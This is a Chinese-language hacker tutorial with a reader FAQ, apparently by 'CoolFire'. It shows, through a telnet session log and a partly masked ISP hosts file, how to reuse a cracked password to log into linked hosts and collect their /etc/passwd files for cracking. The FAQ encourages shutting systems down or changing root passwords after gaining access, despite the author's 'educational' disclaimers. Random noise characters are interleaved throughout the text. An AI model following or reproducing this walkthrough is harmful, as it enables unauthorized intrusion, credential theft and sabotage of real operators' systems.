如何破解系统(5)

这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!
! Y( Q: L/ R0 [/ L# u" m
: {9 R- G3 m; a$ F2 O" E9 G' N各位新年还愉快吗 ?? 有没有人过年还死守著电脑的呀~~ 该出去活动活动罗~~ 当然,过完了年我们有有新的功课要作罗, 在过年前有一位网友 Mail 了一份 passwd 过来,我也因此找到了某家站台的密码, 经深入研究过之後, 决定产生这一篇文章, 大家先热身一下吧!!等一下就会有好戏喔~~

& t! t4 R# D5 }5 G) C
本次主题: 善用你所得到的任何资讯 (Exm: HOSTS 档)
: m, J# f( p! J8 ~6 |# v/ ?, i连接位址: xxx.xxx.xxx.xxx (又马赛克啦)
$ U( m/ j3 t+ L9 N% ]$ F% r, g3 Q特别说明: 因为该站台是一个 "很大" 的 网路提供者, 其服务地区遍及全亚,
4 z/ s( {* z% S! A0 d" i! h. _$ g4 l所以必须要特别以马
赛克来处理, 希望网友们不要介意 (咱们重的是内容嘛!! 又不是..
那个.. 那个).
! W3 Z7 e" N: S& C% s
" Q" T1 H, a7 I0 L3 W& c-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 课程开始 ****
# H( N& [# W; i
+ d( ]1 a# `3 U首先说明的是, 这个网路提供者的服务项目,包含了拨接及传真还有帮其它业者架设网路等, 也就是说如果我们能够善用他们的系统就可以免费传真罗 ?? 哇哩... 国际传真耶,这间公司不就亏大了!!!!!所以马赛克处理是必要的, 不过这次的课程不是说明这个 ISP 够大,而是我们如何利用一组已经破解的密码来入侵其它与其相连的主机, 这点是比较重要的!!

大家可能早就已经知道, 在 Unix 系统中 /etc 目录下的 hosts 档案的作用了,我们今天就来谈谈, 知道的人跳过去吧!! 如果使用 Windoz 95 的人, 也可以看看在你 95的系统目录中也有一个这样子的档案, 他是长得像这个样子的: 127.0.0.1 localhost FETAG , 表示 127.0.0.1 为LocalHost 也就是 FETAG 的电脑, 所以我们要找与该 Unix 有 "直接关系" 的主机可以由这个地方找到.
  J5 B9 E% m% }8 W
找到这些主机有甚麽用呀 ?? 继然你已经有了一个主机的密码,当然其它的主机也可能会有相同的User 在其它的主机上用同样的帐号, 而且依据经验来说,他们在其它主机上的密码通常都跟你目前所拥有的这一份是一样的, 也就是你可以用同样的一组密码游走於其它的主机!!
以下示范的这个例子就是啦!!

! G/ d/ K1 s6 m) Kwww:/etc$ telnet Superman.com.tw
" F) Q9 s% ], M: u! D  YTrying 222.111.111.111...
7 D8 j4 A0 b; O. i1 U# I4 tConnected to Superman.com.tw.
* K3 Z! o- A: ?$ yEscape character is '^]'.

Linux 1.2.8 (Superman.Superman.com.tw) (ttyp0)
(甚麽烂公司, 新版系统的 Bug 少多了, 还不更新~~~)
; ]8 j2 Q0 r' `! o
* f' f- V2 |8 G6 U/ ?, s  S3 u2 v
Superman login: amywang
0 H' Z$ j6 F* y$ y+ @% h$ s7 ePassword:
& P; q( H' u" A  r: E, l7 g+ c
(用你所知道的密码进入)

Linux 1.2.8. (POSIX).
You have new mail.
0 k- G8 b. Y; W; a5 ]' z& G0 s5 M! Z
(不要偷看人家的信喔)

Superman:~$ cd /etc
Superman:/etc$ cat hosts
1 O! H: T' n/ G) o0 G
; R! \8 |& I8 S+ S) t$ J/ L(直接深入今天的主题)
9 K3 _* S4 Z0 V  t4 F
/ Q. P2 A; l( Z8 @6 r6 G7 b0 \# For loopbacking.
127.0.0.1 localhost

222.111.247.1 router
222.111.247.2 abcdf01.tpfoo.Superman.com.tw abcdf01 f01
222.111.247.3 abcdf02.tpfoo.Superman.com.tw abcdf02 f02
222.111.247.4 abcdf03.tpfoo.Superman.com.tw abcdf03 f03
, y5 d2 B! ?! U5 g% K7 E, w4 V222.111.247.5 abcdf04.tpfoo.Superman.com.tw abcdf04 f04

207.121.0.15 abcdhk1.planet.com.hk abcdhk1 hk1
4 z; W1 G3 X* S" B$ [; Z+ R0 v5 ^4 ?
  K: t4 m5 B4 f" U' Y" Y222.111.248.2 abcdf11.tcfoo.Superman.com.tw abcdf11 f11
3 y5 S8 J9 b% K3 p3 _$ f8 t! r
222.111.248.3 abcdf12.tcfoo.Superman.com.tw abcdf12 f12
# }( B7 Q0 k) G$ i1 d; g222.111.248.4 abcdf13.tcfoo.Superman.com.tw abcdf13 f13

$ W  ?/ p9 [+ @2 N8 }1 {+ b222.111.248.131 abcdf21.ksfoo.Superman.com.tw abcdf21 f21
222.111.248.132 abcdf22.ksfoo.Superman.com.tw abcdf22 f22
222.111.248.133 abcdf23.ksfoo.Superman.com.tw abcdf23 f23
222.111.248.134 abcdf24.ksfoo.Superman.com.tw abcdf24 f24
( f7 c; E; d8 i4 ~) q- [& ^/ J; w
$ V1 W# D2 a/ h+ ^222.111.247.33 abcdf01-s1.Superman.com.tw abcdf01-s1 f01-s1
222.111.247.33 abcdf02-s1.Superman.com.tw abcdf02-s1 f02-s1
% ~, m6 `, ]( k) a0 |9 f222.111.247.34 abcdts2-s2.Superman.com.tw abcdts2-s1 ts2-s1

222.111.247.193 abcdf11-s1.Superman.com.tw abcdf11-s1 f11-s1
222.111.247.193 abcdf12-s1.Superman.com.tw abcdf12-s1 f12-s1
( _1 h7 o1 ~7 F+ x222.111.247.194 abcdts1-s1.Superman.com.tw abcdts1-s1 ts1-s1
8 O6 c. e$ ]: z+ O
( @: b4 W1 X. n8 d# G- z222.111.247.73 abcdf21-s1.Superman.com.tw abcdf21-s1 f21-s1
222.111.247.197 abcdf22-s1.Superman.com.tw abcdf22-s1 f22-s1
222.111.247.198 abcdts1-s2.Superman.com.tw abcdts1-s2 ts1-s2
1 C0 f$ d$ D6 n: j% k, ]! b
  P5 ]  Z" s) m8 N9 z222.111.247.201 abcdus1-s1.Superman.com.tw abcdus1-s1 us1-s1
222.111.247.77 abcdus2-s1.Superman.com.tw abcdus2-s1 us2-s1
222.111.247.78 abcdts1-s3.Superman.com.tw abcdts1-s3 ts1-s3

222.111.247.133 abcdts1-l0.Superman.com.tw abcdts1-l0 ts1-l0
9 b; N! E$ j9 h3 E/ r" J222.111.248.10 abcdts2-l0.Superman.com.tw abcdts2-l0 ts2-l0

#206.222.170.2 abcdus1.Superman.com.tw abcdus1 us1
- v6 q& s. N. s#206.222.170.3 abcdus2.Superman.com.tw abcdus2 us2
4 U0 f8 X4 ]& P206.222.170.4 abcdus3.Superman.com.tw abcdus3 us3
; a" i( [, p9 @' q5 _206.222.170.5 abcdus4.Superman.com.tw abcdus4 us4
! o6 f, P- _- P/ J  Q. [% `206.222.170.7 abcdus1+.Superman.com.tw abcdus1+ us1+ us1
9 W$ _% N2 z( g5 V9 R' ]/ o206.222.170.6 abcdus2+.Superman.com.tw abcdus2+ us2+ us2
. T: B' J1 y0 M7 e6 [4 Y+ Z
  c. t" f5 d. J. R5 ^
222.111.247.131 linux01.Superman.com.tw linux01 x01
222.111.247.135 linux03.Superman.com.tw linux03
$ E1 L! E) `. J/ i222.111.247.151 linux04.Superman.com.tw linux04 x04
222.111.247.132 linux02-l0.Superman.com.tw linux02 x02
222.111.111.111 Superman.Superman.com.tw Superman
222.111.27.153 pc3.Superman.com.tw abcdpc3 pc3
; Y5 s, m, Y; Q) M5 d# C( {8 O5 K222.111.27.152 pc2.Superman.com.tw abcdpc2 pc2
222.111.27.147 brian.Superman.com.tw brian brian
( {& L7 i: W0 w, c- x222.111.27.148 linuxpc.Superman.com.tw linuxpc hsliao
! o& k& a6 b* \' G( I/ S220.65.11.1 knet01
203.127.230.243 fooServer.warpdrive.com.sg sgp02
# End of hosts
- H7 n* ?* c; o7 b* {9 N' f% X  f
. |; ]2 q2 u* O! v(我已经尽量在马赛克了!! 如果有没有马赛克完全的地方, 请该网路业者见谅)
(因为是 Telnet LogFile 直接收录的嘛~~ 唉.. 谁叫你的系统这麽脆弱~~)
9 H: F3 z( E. I; d0 E
5 H5 L2 c  ]  j; h' a4 G4 \. V3 OSuperman:/etc$ telnet 220.65.11.1
Trying 210.65.33.2...
7 l! h, \. p# g  v7 B( [( QConnected to 210.65.33.2.
" _/ R! d% u% H! L, m9 t, p) yEscape character is '^]'.

1 N" g9 v: y: z* DLinux 1.2.8 (snet01) (ttyp2)
& W! l9 P  }; \  y7 N- v

knet01 login: amywang
1 N) L6 h4 h9 o8 Z2 f+ U# w3 k4 [Password:

Linux 1.2.8. (KNET01).
" i$ k( |& t. L0 V/ J- |+ k. hYou have new mail.
- g9 s+ C7 [+ J1 B! }' s0 @
% g8 D6 |8 z' v4 T) O& x1 Q(进来了! 就是这样啦!!!!!!)
% E9 F* N; a: a/ U: `0 ^& E
4 U; G2 D5 i- y' C$ h用了这种方法对该主机所连接的各点作测试,找到了一个可以使用所有主机的帐号及密码档案, 我用这个帐号抓了 26 台主机的 /etc/passwd, 现在我的机器还在使用 CJack 对这 26个密码档解码中, 如果有更进一步的消息, 我们会在下一篇的时候一并讨论,当然这个方法不仅适用於这间公司, 对其它的主机也都适用, 这间公司的规模应算不小了, 台湾; 香港; 曰本都有分公司的样子,不过也都.... 呵~
- V: J7 A: S: Q  N0 T6 T* @- J
以上就是 hosts 档的妙用了!! 可能在此篇发表之後大家都用 DNS 了, 而不再编辑 hosts档了~~~ 不过这个档案也可以锁起来呀~~ 限定只有 root 可以用嘛! 反正一些烂 ISP 不是都这样,
一有安全顾虑就限定使用者的使用... 老套了啦!! 你还是会有其它的漏洞的... Linux 1.2.8 哈哈~~~多的是漏洞哩!!!!就算你把 hosts 也锁起来, passwd 也 shadow..还是有一大堆的地方是欢迎大家进入的~~~

嗯.. 没有挑衅的意思啦~~ 各位亲爱的网路提供者... 请将您的系统加锁,以免有任何不测. 上次我们说的那个 ISP (WWW Server 有漏洞的那个), 这次已经将 root 的密码改掉了,但是还是留下许多 User 的密码没有改, Password 档也没有作任何的保护, 对於这样的业者, 哪一家公司的 HomePage 敢放在上面呢 ?? 被人乱改一通不是破坏了公司的形像吗 ??
( U1 T' Y+ u' d* [$ R  M& T! m; S
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 又是字典档 ****
: I, Z; g% i  N5 r2 K4 x) G
这次字典档的部份不再多谈了, 讲讲上一次的一点漏失,由於上次写出来的程式太多地方没有先作考虑, 所以用起来怪怪的 !! 再加上很多的功能没有加上的关系,有很多网友反映出来的问题多在自己操作上的错误, 呵~~ 怪写程式的人没有作好一些检查的动作嘛~~
# K" f) b+ d' [! z, n5 ~' t4 L
所以 CoolFire 决定将上次那个鸟程式重新写过, 配合排序及检查重覆的功能来使用,预计由今天晚上开始动工写出字典档的产生器, 这样才对各位网友们有个交待, 喝呵...不过网友们别抱著太大的希望, 因为 James 的 LetMeIn! 2.0 也还在大家的期盼下久久未见,每天加班的他也实在没甚麽时间,CoolFire 能在甚麽时候写好, 也是未知数. 不过请各位 Mail给我你对此字典档产生器的意见, 还有你希望它能在甚麽作业系统下动作 ?? DOS ?? Windoz ??

8 p. I$ S. }0 |* U4 W-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
7 q& N% T+ ^" a9 C# E
2 W& d* T" m+ o# Z. j! Y  X**** CoolFire FAQ ****
  V* n' {- p( v' d6 E' r0 N* J
实在很想帮大家解决问题, 但是请不要寄来 "请帮我 Crack xxx ISP" 的信件,如果我们的 Home Page 有甚麽问题, 或是你在 Crack 所遭遇到的问题, 欢迎大家来信讨论!! Harlem Liang网友所建议的 StarKrack也是一个不错的 Password Crack 软体, 请大家也帮忙试试喔~~~~
( w- ^" Q1 c; |, s
9 D& k6 J" W: m! V$ F% l3 m[Q1]你在 Coolhc~4 中讲到 Shadow.c 可以用 unix 里的 cc 指令 但如何 Keyin 例如:
ms.hinet.net/harlem/>CC之後呢?
[A1]在 Unix 系统中下以下的指令: cc -o deshadow shadow.c 最後所产生出来的deshadow 就是执行档名了Unix 是一个不错的系统, 尤其是想要学习 Crack Password或入侵的中H都一定踯n经过这个门槛, 大家可以多看看一些有关 Unix 的书籍, 当然 c 语言也是其必须的罗~~~:)
9 `/ ]5 ^+ |- m# L% t' D
[Q2]deshadow 是在 Unix 下执行,还是在Dos下执行, 用 C 语言可不可以转换?可不可以把shadow的 passwd拿回来再转换?[A2]呵~~ 既然 /etc/passwd 已经 shadow 了! 你拿回来的当然是没有用的密码档,只能知道其 user 的名字而已, 所以如果要拿回来 Crack 当然是不可能的, 而 DeShadow 是针对 Unix系统的漏洞所设计的,且只能在 Unix 上尝试 DeShadow.. 故请在 Unix 上 Compiler 再执行,当然有些系统可能已经将漏洞补上了, 或因为网路安全的问题不提供使用者编译档案,那就只好使用其它方法罗~~~:)
0 e3 ?9 v( a. G! L$ b# R2 F( T
, F# J  C6 d" q: e, }. I[Q3]我找到root的密码了! 用kOS的字典档XXXX的etc/passwd 用Star Cracker,只花了1小时30分 就找到了!找到root的密码可以做甚麽呢? 你有没有用kOS crack XXXX的 passwd花了多久time?[A3]哇 !! 恭喜你罗!(注: XXXX 部份为 "马赛克" ) 找到 root 的密码後能作甚麽 ???
0 X* f6 X# G! `, f/ B1 O7 t1 m/ A7 W呵.. 随便你罗, 想要作甚麽就作甚麽, 当然可以更进一步的得到更多的东西,你可以任意修改系统(小心触法), 也可以在心情不好的时候把系统 "关" 起来, 不让别人上线, 亦可以更改 root 的密码,让他们的 root 没有办法维护系统, 反正系统是你的了! 问我能作甚麽 ?? 我也不能回答你..... :)我当然也 Crack 过, 不过时间嘛... 没算, 因为我都是用好几台电脑在跑的 (利用下班时间),所以操作环境跟你不同罗!!

) h. t* u- Y+ q: v/ v: F[Q4]看hopenet知道linux的bin/login中有一个很大漏洞可以取得root的权限是怎麽一回事呢?
[A4]该文章附有一 URL 位址, 请连上去看看後就知道了, 现在也有许多人讨论这些东西,不过很多公司用的 Linux 都还是 1.x.x 版的, 很好 Crack... 试试吧! 保证你会爱上它~~ 呵~

[Q5]Cyberspace是什麽样的组织?
" }' C- l  h8 w3 D+ q* E7 A[A5]嗯 ?? 连这种问题都有人问呀~~~ 请到 www.cyberspace.org 看看就知道罗~~~

[Q6] I have a question for the 'GZ' file format.
[A6]对呀!! 放了字典档的连结在首页上就出现了很多问 .z .gz 档要怎麽解的问题了,我的系统安装了 Winzip, Pkunzip, Gzip 後 .z .gz 就变成 Winzip 可解的档案了,知道该怎麽办了吧~~
3 F& B- r0 _' @3 i( b( F& K4 i
& d& x& w/ a4 N) ~2 h[Q7]我日前从你的站台连至GlobalKOS下传jack14的辅助工具,不过我的连线速度太慢,所以一直
5 e/ T2 {* K. \  D, l0 R! _/ U抓不回来,你可以 mirror 回来吗?[A7]这种问题我也只好 Say "SORRY" 罗, 我们的首页上已经放了很多东西了,而且也都是开放让同好们 "免费" 参观及抓取 (绝不收费啦!!), 且一个 kOS 就要 1.xxMB 那麽大,我基於要放更多东西的关系提供了一个 Hot Link 在上面, 请各位 "努力" 吧!!不然换条线试试, 你用的可能是学术网路吧!! 可不可以在非巅锋时间抓呢?? 还是弄个 ftp Server 帮你抓,信箱够大的话可以用 Mail FTP... 等, 都可以达到你的目地的~~~:)

[Q8]我去找到了一个站的密码档,之後我执行JACK却出现 Virtual mode not supportedwithout VCPI的讯息,请问是什麽错误?[A8]这位网友可能是使用 Windoz 95 的 DOS BOX 所出现的讯息吧!! VCPI 要在EMM386.EXE 挂上後有效, 也就是说最好在纯 DOS 下挂上 EMM386.EXE 再使用 Crack Jack,另外使用的时候也不要在 EMM386.EXE 後下 NOEMS 的参数, 不然 CJack 也不会理你, 至於怎麽在Win95 的DOS BOX 中使用 CJack ?? 我也不知道! 有没有人试成功的, 请出个声吧!!

4 H1 C* H: S5 X[Q9]我如果由www得到密码档,破解之後我要从那输入密码?
[A9]嗯, 很简单呀!! 启动你的 Telnet 软体 (NetTerm... Telnet... etc.) 连线到www.xxx.xxx.xxx 去, 然後就可以输入密码, 依正常程序 Login 就成了!! 加油喔~~ Enjoy Hacking~:)
[Q10]我无法将字典档抓下来, 可否用E-MAIL寄给我
$ _7 O# U* H, Q( c$ S  M# r[A10]........ 谁来帮我回答~~~~?
: |6 C! o( _5 v& G
7 F$ S% B( U. Z) j/ `) v
- J5 y5 W& ~$ i  g. @- q, n**** 後语 ****
4 Q, N& {( C4 \
作这份东西的动机是 "兴趣", 入侵到他人的主机是属於非法的行为?但是我并没有作任何的破坏动作, 纯粹就是 "好玩", 当然也因此突显出许多站台的安全性问题,所以这份文章也就有点"教育"这些破站台的意味存在. 有许多的网有对 CoolFire 充满了信心, 寄了许多站台的网址来"求破",呵.. 我只能看看, 不能够将每天的心力都投注在上面, 网友们也许比较有时间吧!!大家可以一起到 Hacker 论坛讨论讨论.
, b0 G- N" [% R* s: ^
我们的首页感谢大家的支持, 现在人数.... 呵, 已经不准了!不晓得是哪位网友跑到咱们的 Cgi-Count去动了手脚, 原本过年前还在 32xx 的人, 现在已经倒退了, 暂且不管网友们是如何想的,下次若再出现这样的状况, 这个首页可能因此关门大吉罗~~~
  C# c7 i7 w8 E! @
7 R* L& q5 \/ F1 H- [4 @- a5 E** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page将会完全关闭, 再
也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识",不要利用它来夺取任何的"权利", 本首页著重的是教育, 而不是一　的教导攻击的方法, 希望大家对於政府机关(org.tw) 或教育机构 (edu.tw) 不要作任何的破坏!! 还有我的 ISP......:D
谢谢大家的支持~

+ A! ~2 W# b2 o; Z6 e  K8 I( y5 F------
9 v2 x4 `- X4 k$ _) v. q- s再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上 (又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

$ t7 T* X; U. {: ], T2 [+ l2 z. @" ?